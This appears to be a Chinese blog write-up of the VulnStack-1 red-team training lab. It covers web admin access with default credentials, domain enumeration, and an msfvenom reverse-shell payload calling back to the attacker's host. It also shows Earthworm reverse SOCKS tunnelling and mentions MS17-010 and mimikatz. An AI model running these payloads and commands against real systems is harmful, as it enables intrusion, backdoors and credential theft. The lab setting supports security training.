ATT&CK红队评估实战内网靶场(一) VulnStack-1
文章目录
前言
Onebug.org | 安全防线
ATT&CK红队评估实战内网靶场(一) VulnStack-1
参考网址:https://www.onebug.org/vulnstudy/99041.html
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019:
一、win 7
webshell
win7主机下有phpstudy需要自己启动。如有启动报错请重启主机。
result of dirsearch
/yxcms
/phpmyAdmin
/phpMyAdmin
教训:好字典的重要性,要死就是没找到合适的字典,算了 直接将yxcms加到字典里吧www
1.yxcms
访问 yxcms
在右下角form中有提示
/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。
访问后台
http://192.168.21.145/yxcms/index.php?r=admin
二、信息收集
信息收集
发现Antwork 在返回信息时,有时会BUG
基本点
1.本机信息收集
2.域信息收集
whoami /all 查询域SID
net user test1 /domain 查询当前指定账户的详细信息
net config workstation 查询当前登录域及登录用户信息
net time /domain
一般会有三种情况:
存在域,但当前用户不是域用户,提示说明权限不够
存在域,并且当前用户是域用户
当前网络环境为工作组,不存在域
net group “Domain Controllers” /domain 查找域控
也可以采用 WMIC脚本来收集
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
探测域内其他主机
这里使用arp扫描 和nbtscan来收集域内信息
arp-scan_64.exe -t 192.168.52.1/20 >1.txt
Reply that 00:0C:29:86:6F:BA is 192.168.52.138 in 15.289000
Reply that 00:0C:29:2A:99:BC is 192.168.52.141 in 16.001900
Reply that 00:0C:29:A3:B3:2A is 192.168.52.143 in 0.040600
Reply that 00:0C:29:A3:B3:2A is 192.168.52.255 in 0.048100
C:\tmp> nbtscan-1.0.35.exe 192.168.52.0/24 >z.txt*timeout (normal end of scan)
192.168.52.138 GOD\OWA
SHARING DC192.168.52.141 GOD\ROOT-TVI862UBEH
SHARING192.168.52.143 GOD\STU1 SHARING
三、关闭防火墙
1.进入内网
制作木马后门
#kalimsfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.21.129 lport=23333 -f exe > /root/Desktop/reverse_tcp.exe
将木马上传到win7并执行。
2.代理
但为了kali 能直接访问内网,我们还需开启代理
祭出 橙色神器 Earthworm
https://bbs.ichunqiu.com/thread-36219-1-2.html
反弹 SOCKS v5 服务器
同样需要先上传ew_for_Win.exe到边界机
kali
修改proxychains文件
文件地址 /etc/proxychains.conf
修改为
[ProxyList]#
add proxy here ...# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
#socks5 192.168.21.144 1080
socks5 127.0.0.1 1080
监听1080端口
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
win7
ew_for_Win.exe -s rssocks -d 192.168.21.129 -e 8888
代理msf
设置proxychains 配置文件
编辑 /etc/proxychains.conf文件
添加一条代理记录
3.ms17-010
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
scan
先使用ms17010命令执行 关闭防火墙,否则无法弹回shell
执行成功
4.mimikatz
之后可以利用mimikatz来获取密码
r8要先登录,能正常使用
exploit – success
四、我的公众号
后续操作请持续关注哦!!!
了解更多请关注下列公众号:
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗
😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗 😗😗😗😗😗😗😗😗😗